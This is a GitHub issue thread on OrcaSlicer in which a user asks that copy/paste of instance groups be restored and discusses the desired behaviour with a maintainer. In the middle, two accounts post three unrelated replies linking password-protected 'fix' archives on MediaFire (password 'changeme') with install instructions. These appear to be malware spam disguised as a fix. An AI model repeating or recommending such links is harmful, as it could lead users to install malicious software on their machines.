OrcaSlicer/OrcaSlicer #6570: Re-add Copy/Paste of Instance Groups

morganvenable, 2024-08-26:
### Is there an existing issue for this feature request?

- [X] I have searched the existing issues

### Is your feature request related to a problem?

https://github.com/SoftFever/OrcaSlicer/pull/6237 re-adds instancing support -- amazing!

But Copy/Paste of an Instance group today with 6237 only pastes the single master part, not the instance group

Prusaslicer's underlying behavior allows copy/pasting of instance groups to create a new instance group with a new master -- for people who print large numbers of parts with small variations, this is extremely useful to quickly reproduce identical arrays with different parts.

### Which printers will be beneficial to this feature?

All

### Describe the solution you'd like

When copy/pasting instances of an object, all instances should be pasted.
A new master should be created for the pasted instances, as in Prusaslicer.

### Describe alternatives you've considered

An option to paste instances linked to the *ORIGINAL* master would also be very useful for making complicated plates, but probably requires more work.

morganvenable, 2024-08-26:
@vovodroid if you have any suggestions for where I should start poking on this, I'd be happy to take a crack at it.

youngerwarrior, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

scppuna, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

scppuna, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

vovodroid, 2024-09-12:
Hi, can you please upload screenshots with desired functionality in Prusa? As I see if copy-paste instance group you get new object.

vovodroid, 2024-09-12:
> Bambu, the Clone function tiles correctly,

But there are no instances in Bambu? Do you copy-paste group of objects?

morganvenable, 2024-09-12:
Yes.  The use cases as follows:
I have 100 identical parts which I need to arrange in a tight grid.
I also have variants of these parts with the same general shape.

In prusa, I could create and arrange one instance group, copy/paste it onto
several different plates, and replace the part in each instant group to get
several different plates of several different parts, all in the same
physical configuration.

morganvenable, 2024-12-12:
Definitely not stale, still sorely missed by many 🙏